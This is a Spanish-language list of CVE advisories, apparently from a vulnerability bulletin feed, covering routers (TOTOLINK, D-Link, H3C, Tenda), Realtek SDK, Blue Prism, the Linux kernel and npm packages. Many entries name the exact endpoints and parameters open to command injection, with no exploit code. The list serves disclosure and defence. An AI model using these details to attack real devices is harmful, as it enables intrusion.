    Realtek Jungle SDK versiones v2.x hasta v3.4.14B, proporciona un servidor web HTTP que expone una interfaz de administración que puede ser usada para configurar el punto de acceso. Se presentan dos versiones de esta interfaz de administración: una basada en Go-Ahead denominada webs y otra basada en Boa denominada boa. Ambas están afectadas por estas vulnerabilidades. Específicamente, estos binarios son vulnerables a los siguientes problemas - desbordamiento del búfer de la pila en formRebootCheck debido a una copia no segura del parámetro submit-url - desbordamiento del búfer de la pila en formWsc debido a una copia no segura del parámetro submit-url - desbordamiento del búfer de la pila en formWlanMultipleAP debido a una copia no segura del parámetro submit-url - desbordamiento del búfer de la pila en formWlSiteSurvey debido a una copia no segura del parámetro ifname - desbordamiento del búfer de la pila en formStaticDHCP debido a una copia no segura del parámetro hostname - desbordamiento del buffer de la pila en formWsc debido a una copia no segura del parámetro "peerPin" - ejecución arbitraria de comandos en formSysCmd por medio del parámetro sysCmd - inyección arbitraria de comandos en formWsc por medio del parámetro "peerPin". Una Explotación de los problemas identificados variará en función de lo que el proveedor/fabricante final haya hecho con el servidor web del SDK de Realtek. Algunos vendedores lo usan tal cual, otros añaden su propia implementación de autenticación, algunos mantienen todas las funcionalidades del servidor, otros eliminan algunas de ellas, otros insertan su propio conjunto de características. Sin embargo, dado que la implementación del SDK de Realtek está llena de llamadas no seguras y que los desarrolladores tienden a reusar esos ejemplos en su código personalizado, cualquier binario basado en el servidor web del SDK de Realtek probablemente contenga su propio conjunto de problemas además de los de Realtek (si se mantienen). Una explotación con éxito de estos problemas permite a atacantes remotos obtener una ejecución de código arbitrario en el dispositivo.
  • CVE-2021-40288
    Severidad: ALTA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Un ataque de denegación de servicio en los métodos de autenticación WPA2 y WPA3-SAE en TP-Link AX10v1 versiones anteriores a V1_211014, permite a un atacante remoto no autenticado desconectar un cliente inalámbrico ya conectado por medio del envío con un adaptador inalámbrico de tramas de autenticación falsas específicas
  • CVE-2021-36762
    Severidad: ALTA
    Fecha de publicación: 19/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en HCC Embedded InterNicheStack versiones hasta 4.3. La función packet processing TFTP tfshnd():tftpsrv.c no asegura que un nombre de archivo esté apropiadamente terminado en "\0"; por lo tanto, una llamada posterior a strlen para el nombre de archivo podría leer fuera de límites del búfer de paquetes del protocolo (si no presenta ningún byte "\0" dentro de un rango razonable).
  • CVE-2021-38575
    Severidad: MEDIA
    Fecha de publicación: 01/12/2021
    Fecha de última actualización: 02/08/2023
    NetworkPkg/IScsiDxe presenta unos desbordamientos de búfer explotables de forma remota
  • CVE-2022-24448
    Severidad: BAJA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el archivo fs/nfs/dir.c en el kernel de Linux versiones anteriores a 5.16.5. Si una aplicación establece la bandera O_DIRECTORY, y trata de abrir un archivo regular, la función nfs_atomic_open() lleva a cabo una búsqueda regular. Si es encontrado un archivo regular, debería producirse ENOTDIR, pero el servidor en su lugar devuelve datos no inicializados en el descriptor de archivo
  • CVE-2022-28796
    Severidad: MEDIA
    Fecha de publicación: 08/04/2022
    Fecha de última actualización: 08/08/2023
    La función jbd2_journal_wait_updates en el archivo fs/jbd2/transaction.c en el kernel de Linux versiones anteriores a 5.17.1, presenta un uso de memoria previamente liberada causado por una condición de carrera transaction_t
  • CVE-2021-38598
    Severidad: MEDIA
    Fecha de publicación: 23/08/2021
    Fecha de última actualización: 08/08/2023
    OpenStack Neutron versiones anteriores a 16.4.1, 17.x versiones anteriores a 17.1.3 y 18.0.0, permite una suplantación de direcciones de hardware cuando es usado el controlador linuxbridge con ebtables-nft en una plataforma basada en Netfilter. Mediante el envío de paquetes cuidadosamente diseñados, cualquier persona que controle una instancia de servidor conectada al conmutador virtual puede suplantar las direcciones de hardware de otros sistemas en la red, resultando en una denegación de servicio o, en algunos casos, a una posible interceptación del tráfico previsto para otros destinos.
  • CVE-2021-42278
    Severidad: MEDIA
    Fecha de publicación: 10/11/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Active Directory Domain Services. Este ID de CVE es diferente de CVE-2021-42282, CVE-2021-42287, CVE-2021-42291
  • CVE-2021-33624
    Severidad: MEDIA
    Fecha de publicación: 23/06/2021
    Fecha de última actualización: 08/08/2023
    En el archivo kernel/bpf/verifier.c en el kernel de Linux versiones anteriores a 5.12.13, una rama puede ser mal predicha (por ejemplo, debido a la confusión de tipos) y, en consecuencia, un programa BPF no privilegiado puede leer ubicaciones de memoria arbitrarias por medio de un ataque de canal lateral, también conocido como CID-9183671af6db
  • CVE-2021-41379
    Severidad: MEDIA
    Fecha de publicación: 10/11/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios del instalador de Windows
  • CVE-2022-28940
    Severidad: ALTA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    En H3C MagicR100 versiones anteriores a V100R005 incluyéndola, puede accederse a la interfaz / Ajax / ajaxget sin autorización. Es enviada una gran cantidad de datos mediante ajaxmsg para llevar a cabo un ataque DOS
  • CVE-2022-20725
    Severidad: BAJA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo anfitrión subyacente, ejecutar código arbitrario en el sistema operativo anfitrión subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2021-24018
    Severidad: MEDIA
    Fecha de publicación: 04/08/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de subescritura del búfer en la rutina de verificación del firmware de FortiOS versiones anteriores a 7.0.1, puede permitir a un atacante ubicado en la red adyacente ejecutar potencialmente código arbitrario por medio de una imagen de firmware específicamente diseñada
  • CVE-2022-26356
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una activación del modo de registro sucio realizada por XEN_DMOP_track_dirty_vram (es llamada HVMOP_track_dirty_vram antes de Xen versión 4.9) es producido con las hiperllamadas de registro sucio en curso. Una llamada a XEN_DMOP_track_dirty_vram con el tiempo apropiado puede habilitar log dirty mientras otra CPU está todavía en el proceso de desmontar las estructuras relacionadas con un modo log dirty previamente habilitado (XEN_DOMCTL_SHADOW_OP_OFF). Esto es debido a una falta de bloqueo mutuamente excluyente entre ambas operaciones y puede conllevar a que son añadidas entradas en ranuras ya liberadas, dando lugar a una pérdida de memoria
  • CVE-2022-35203
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/08/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en TrendNet TV-IP572PI versión v1.0, permite a atacantes no autenticados acceder a información confidencial del sistema.
  • CVE-2022-33142
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio (DoS) autenticado (subscriber+) en el plugin WordPlus WordPress Better Messages versiones anteriores a 1.9.10.57 incluyéndola, en WordPress.
  • CVE-2022-25302
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/08/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete asneg/opcuastack son vulnerables a una Denegación de Servicio (DoS) debido a una falta de un administrador para el casting fallido cuando los datos no validados son enviados a la función boost::get en el archivo OpcUaNodeIdBase.h. La explotación de esta vulnerabilidad es posible cuando es enviado un mensaje OPC UA específicamente diseñado con un NodeId codificado especial.
  • CVE-2022-35235
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Lectura Arbitraria de Archivos Autenticada (admin+) en el plugin WPide de XplodedThemes versiones anteriores a 2.6 incluyéndola, en WordPress.
  • CVE-2022-36456
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A720R V4.1.5cu.532_B20210610 contiene una vulnerabilidad de inyección de comandos por medio del parámetro username en el archivo /cstecgi.cgi.
  • CVE-2022-36481
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro ip en la función setDiagnosisCfg.
  • CVE-2022-36479
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro host_time en la función NTPSyncWithHost.
  • CVE-2022-36482
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro lang en la función setLanguageCfg.
  • CVE-2022-36485
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro hostName en la función setOpModeCfg.
  • CVE-2022-36486
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro FileName en la función UploadFirmwareFile.
  • CVE-2022-36458
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A3700R versión V9.1.2u.6134_B20201202, contiene una vulnerabilidad de inyección de comandos por medio del parámetro command en la función setTracerouteCfg.
  • CVE-2022-36459
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A3700R versión V9.1.2u.6134_B20201202, contiene una vulnerabilidad de inyección de comandos por medio del parámetro host_time en la función NTPSyncWithHost.
  • CVE-2022-36460
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A3700R versión V9.1.2u.6134_B20201202, contiene una vulnerabilidad de inyección de comandos por el parámetro FileName en la función UploadFirmwareFile.
  • CVE-2022-36461
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A3700R versión V9.1.2u.6134_B20201202, contiene una vulnerabilidad de inyección de comandos por medio del parámetro hostName en la función setOpModeCfg.
  • CVE-2022-36487
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK N350RT versión V9.3.5u.6139_B20201216, contiene una vulnerabilidad de inyección de comandos por medio del parámetro command en la función setTracerouteCfg.
  • CVE-2022-37076
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro FileName en la función UploadFirmwareFile.
  • CVE-2022-21208
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/08/2022
    Fecha de última actualización: 08/08/2023
    El paquete node-opcua versiones anteriores a 2.74.0, es vulnerable a una Denegación de Servicio (DoS) debido a una falta de limitación del número de trozos recibidos, por sesión individual o en total para todas las sesiones concurrentes. Un atacante puede explotar esta vulnerabilidad mediante el envío de un número ilimitado de chunks enormes (por ejemplo, 2GB cada uno) sin enviar el chunk de cierre Final.
  • CVE-2022-37810
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC1206 versión V15.03.06.23, contiene una vulnerabilidad de inyección de comandos por medio del parámetro mac en la función formWriteFacMac.
  • CVE-2022-37082
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro host_time en la función NTPSyncWithHost.
  • CVE-2022-37083
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro ip en la función setDiagnosisCfg.
  • CVE-2022-37078
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro lang en la función /setting/setLanguageCfg.
  • CVE-2022-37079
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro hostName en la función setOpModeCfg.
  • CVE-2022-37081
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A7000R versión V9.1.0u.6115_B20201022, contiene una vulnerabilidad de inyección de comandos por medio del parámetro command en setting/setTracerouteCfg.
  • CVE-2022-36455
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A3600R versión V4.1.2cu.5182_B20201102, contiene una vulnerabilidad de inyección de comandos por medio del parámetro username en el archivo /cstecgi.cgi.
  • CVE-2022-36509
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que H3C GR3200 MiniGR1B0V100R014 contiene una vulnerabilidad de inyección de comandos por medio del parámetro param en DelL2tpLNSList.
  • CVE-2022-36510
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que H3C GR2200 MiniGR1A0V100R014 contiene una vulnerabilidad de inyección de comandos por medio del parámetro param en DelL2tpLNSList.
  • CVE-2018-14463
    Severidad: MEDIA
    Fecha de publicación: 03/10/2019
    Fecha de última actualización: 16/08/2023
    El analizador de VRRP en tcpdump versiones anteriores a 4.9.3 presenta una lectura excesiva del búfer en print-vrrp.c:vrrp_print() para la versión 2 de VRRP, una vulnerabilidad diferente a la CVE-2019-15167.
  • CVE-2021-0946
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    El método PVRSRVBridgePMRPDumpSymbolicAddr asigna puiMemspaceNameInt en la pila, llena el contenido del búfer por medio de PMR_PDumpSymbolicAddr y luego copia el búfer al espacio de usuario. El método PMR_PDumpSymbolicAddr puede fallar, y si lo hace, el búfer será dejado sin inicializar y, a pesar del error, seguirá copiándose al espacio de usuario. Filtración en el kernel de datos de la pila no inicializados sin ser requeridos privilegios. Producto: Android, Versiones: Android SoC, ID de Android: A-236846966
  • CVE-2021-0947
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    El método PVRSRVBridgeTLDiscoverStreams asigna puiStreamsInt en el heap, llena el contenido del buffer por medio de TLServerDiscoverStreamsKM, y luego copia el buffer al espacio de usuario. El método TLServerDiscoverStreamsKM puede fallar por varias razones, incluyendo tamaños no válidos. Si este método falla, el búfer se dejará sin inicializar y, a pesar del error, seguirá copiándose en el espacio de usuario. Filtración en el kernel de datos de la pila no inicializados sin ser requeridos privilegios. Producto: Android, Versiones: Android SoC, ID de Android: A-236838960
  • CVE-2022-37070
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que H3C GR-1200W MiniGRW1A0V100R006, contiene una vulnerabilidad de inyección de comandos por medio del parámetro param en DelL2tpLNSList.
  • CVE-2022-37240
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    MDaemon Technologies SecurityGateway for Email Servers versión 8.5.2, es vulnerable a una división de respuestas HTTP por medio del parámetro format.
  • CVE-2022-37242
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    MDaemon Technologies SecurityGateway for Email Servers 8.5.2, es vulnerable a la división de la respuesta HTTP por medio del parámetro data.
  • CVE-2022-23235
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Active IQ Unified Manager para VMware vSphere, Linux y Microsoft Windows versiones anteriores a 9.10P1, son susceptibles de sufrir una vulnerabilidad que podría permitir a un atacante detectar información específica del clúster, del nodo y de Active IQ Unified Manager por medio de los datos de telemetría de AutoSupport que son enviados incluso cuando AutoSupport ha sido deshabilitado.
  • CVE-2022-38078
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    La API XMLRPC de Movable Type proporcionada por Six Apart Ltd. contiene una vulnerabilidad de inyección de comandos. El envío de un mensaje especialmente diseñado mediante el método POST a la API Movable Type XMLRPC puede permitir una ejecución de un script Perl arbitrario, y un comando OS arbitrario puede ser ejecutado mediante él. Los productos y versiones afectados son los siguientes Movable Type 7 versiones r.5202 y anteriores, Movable Type Advanced 7 versiones r.5202 y anteriores, Movable Type versiones 6.8.6 y anteriores, Movable Type Advanced versiones 6.8.6 y anteriores, Movable Type Premium versiones 1.52 y anteriores, y Movable Type Premium Advanced versiones 1.52 y anteriores. Tenga en cuenta que todas las versiones de Movable Type versiones 4.0 o posteriores, incluidas las versiones sin soporte (End-of-Life, EOL), también están afectadas por esta vulnerabilidad.
  • CVE-2022-36226
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    SiteServerCMS versión 5.X, presenta una vulnerabilidad Remote-download-Getshell-vulnerability por medio del archivo /SiteServer/Ajax/ajaxOtherService.aspx.
  • CVE-2022-24552
    Severidad: ALTA
    Fecha de publicación: 06/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo en la API REST de StarWind Stack. El comando REST, que manipula un disco virtual, no comprueba los parámetros de entrada. Algunos de ellos van directamente a bash como parte de un script. Un atacante con acceso de usuario no root puede inyectar datos arbitrarios en el comando que se ejecutará con privilegios de root. Esto afecta a StarWind SAN y NAS v0.2 build 1633
  • CVE-2022-36687
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Ingredients Stock Management System versión v1.0, contiene una vulnerabilidad de eliminación arbitraria de archivos por medio del componente /classes/Master.php?f=delete_img
  • CVE-2022-38557
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link DIR845L versión v1.00-v1.03, contiene una vulnerabilidad de Credenciales Estáticas por Defecto en el archivo /etc/init0.d/S80telnetd.sh.
  • CVE-2022-37056
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link GO-RT-AC750 versiones GORTAC750_revA_v101b03 y GO-RT-AC750_revB_FWv200b02, son vulnerables a una inyección de comandos por medio de /cgibin, hnap_main,
  • CVE-2022-36120
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que exponga el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para la función administrativa getChartData. usando una cuenta de usuario de Blue Prism con pocos o ningún privilegio, el atacante puede alterar la configuración del servidor abusando del método getChartData, permitiendo que el servidor de Blue Prism ejecute cualquier procedimiento almacenado MSSQL por su nombre.
  • CVE-2022-38511
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A810R versión V5.9c.4050_B20190424, contiene una vulnerabilidad de inyección de comandos por medio del componente downloadFile.cgi
  • CVE-2022-36121
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que exponga el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para la función administrativa UpdateOfflineHelpData. El abuso de esta función permitirá a cualquier usuario de Blue Prism cambiar la URL de la ayuda fuera de línea por una de su elección, abriendo la posibilidad de falsificar la página de ayuda o ejecutar un archivo local.
  • CVE-2022-36118
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que exponga el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para la función administrativa SetProcessAttributes. El abuso de esta función permitirá a cualquier usuario de Blue Prism publicar, despublicar o retirar procesos. Usando esta función, cualquier usuario conectado puede cambiar el estado de un proceso, una acción permitida sólo para usuarios con el permiso de Editar Proceso.
  • CVE-2022-36755
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link DIR845L A1 contiene una vulnerabilidad de autenticación por medio de un valor AUTHORIZED_GROUP=1, como es demostrado en una petición del archivo getcfg.php.
  • CVE-2022-36756
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    DIR845L A1 versión v1.00-v1.03, es vulnerable a una inyección de comandos por medio del archivo /htdocs/upnpinc/gena.php.
  • CVE-2022-37053
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    TRENDnet TEW733GR versión v1.03B01, es vulnerable a una inyección de comandos por medio del archivo /htdocs/upnpinc/gena.php.
  • CVE-2022-37057
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link Go-RT-AC750 versiones GORTAC750_revA_v101b03 y GO-RT-AC750_revB_FWv200b02, son vulnerables a una Inyección de Comandos por medio de cgibin, ssdpcgi_main.
  • CVE-2022-38556
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/08/2022
    Fecha de última actualización: 08/08/2023
    Trendnet TEW733GR versión v1.03B01, contiene una vulnerabilidad de Credenciales Estáticas por Defecto en el archivo /etc/init0.d/S80telnetd.sh.
  • CVE-2021-43996
    Severidad: ALTA
    Fecha de publicación: 17/11/2021
    Fecha de última actualización: 08/08/2023
    El componente Ignition versiones anteriores a 1.16.15, y versiones 2.0.x anteriores a 2.0.6, para Laravel presenta una función "fix variable names" que puede conllevar un control de acceso incorrecto.
  • CVE-2022-25644
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/08/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete @pendo324/get-process-by-name son vulnerables a una Ejecución Arbitraria de Código debido a un saneo inapropiado de la función getProcessByName
  • CVE-2022-25921
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/08/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete morgan-json son vulnerables a una Ejecución Arbitraria de Código debido a una falta de saneo de la entrada pasada al constructor de la función
  • CVE-2022-25887
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    El paquete sanitize-html versiones anteriores a 2.7.1, es vulnerable a una Denegación de Servicio por Expresión Regular (ReDoS) debido a una inseguridad de la lógica de reemplazo global de expresiones regulares en la eliminación de comentarios HTML
  • CVE-2021-3020
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en ClusterLabs Hawk (también se conoce como HA Web Konsole) hasta la versión 2.3.0-15. Es enviado el binario hawk_invoke (construido a partir de tools/hawk_invoke.c), destinado a ser usado como un programa setuid. Esto permite al usuario hacluster invocar determinados comandos como root (con un intento de limitar esto a combinaciones seguras). Este usuario es capaz de ejecutar un "shell" interactivo que no está limitado a los comandos especificados en hawk_invoke, permitiendo una escalada a root.
  • CVE-2022-21165
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/08/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete font-converter son vulnerables a una inyección arbitraria de comandos debido a una falta de saneo de la entrada que potencialmente fluye hacia la función child_process.exec()
  • CVE-2022-36117
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que expone el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para una función administrativa. Si el acceso a las credenciales está configurado para que sea accesible por una máquina o el grupo de seguridad de recursos en tiempo de ejecución, mediante ingeniería inversa adicional, un atacante puede suplantar una máquina conocida y solicitar credenciales cifradas conocidas para descifrarlas posteriormente.
  • CVE-2022-36116
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que exponga el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para la función administrativa setValidationInfo. La eliminación de la comprobación aplicada a los procesos de nuevo diseño aumenta la posibilidad de ocultar con éxito el código malicioso que podría ejecutarse en un entorno de producción.
  • CVE-2022-36115
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Blue Prism Enterprise versiones 6.0 hasta 7.01. En un entorno configurado inapropiadamente que exponga el servidor de aplicaciones de Blue Prism, es posible que un usuario autenticado realice ingeniería inversa del software de Blue Prism y omita los controles de acceso para conseguir una funcionalidad no deseada. Un atacante puede abusar del método CreateProcessAutosave() para inyectar su propia funcionalidad en un proceso de desarrollo. Si (tras una advertencia) un usuario decide recuperar el trabajo no guardado usando la última versión guardada, el código malicioso podría entrar en el flujo de trabajo. Si las etapas de acción del proceso no son revisadas completamente antes de su publicación, esto podría resultar en que el código malicioso sea ejecutado en un entorno de producción.
  • CVE-2022-31798
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos Nortek Linear eMerge E3-Series versión 0.32-07p, son vulnerables a /card_scan.php?CardFormatNo= XSS con fijación de sesión (por medio de PHPSESSID) cuando están encadenados. Esto permitiría a un atacante tomar el control de una cuenta de administrador o de usuario.
  • CVE-2022-37123
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    D-link DIR-816 versión A2_v1.10CNB04.img, es vulnerable a una inyección de comandos por medio del archivo /goform/form2userconfig.cgi
  • CVE-2022-37129
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    D-Link DIR-816 versión A2_v1.10CNB04.img, es vulnerable a una inyección de comandos por medio de /goform/SystemCommand. Después de que el usuario pase el parámetro del comando, será empalmado en byte_4836B0 por snprintf, y finalmente doSystem(&byte_4836B0); será ejecutado, resultando en una inyección de comando
  • CVE-2022-36564
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso incorrecto en el directorio de instalación (C:\Strawberry) de StrawberryPerl versiones v5.32.1.1 y anteriores, permite a atacantes autenticados ejecutar código arbitrario por medio de la sobreescritura de los binarios ubicados en el directorio
  • CVE-2022-36565
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso incorrecto en el directorio de instalación (C:\Wamp64) de Wamp versiones v3.2.6 y anteriores, permite a atacantes autenticados ejecutar código arbitrario por medio de la sobreescritura de binarios ubicados en el directorio
  • CVE-2022-37172
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso incorrecto en el directorio de instalación (C:\msys64) de Msys2 versiones v20220603 y anteriores, permite a atacantes autenticados ejecutar código arbitrario por medio de la sobreescritura de binarios ubicados en el directorio
  • CVE-2022-36202
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    Doctors Appointment System versión 1.0, es vulnerable a un Control de Acceso Incorrecto por medio del archivo edoc/patient/settings.php. El archivo settings.php está afectado por un Control de Acceso Incorrecto (IDOR) por medio del parámetro id=
  • CVE-2022-37176
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    Tenda AC6(AC1200) versión v5.0 Firmware versiones v02.03.01.114 y anteriores, contiene una vulnerabilidad que permite a atacantes eliminar la contraseña de Wi-Fi y forzar el dispositivo en modo de seguridad abierto por medio de un paquete diseñado enviado a goform/setWizard
  • CVE-2022-36563
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
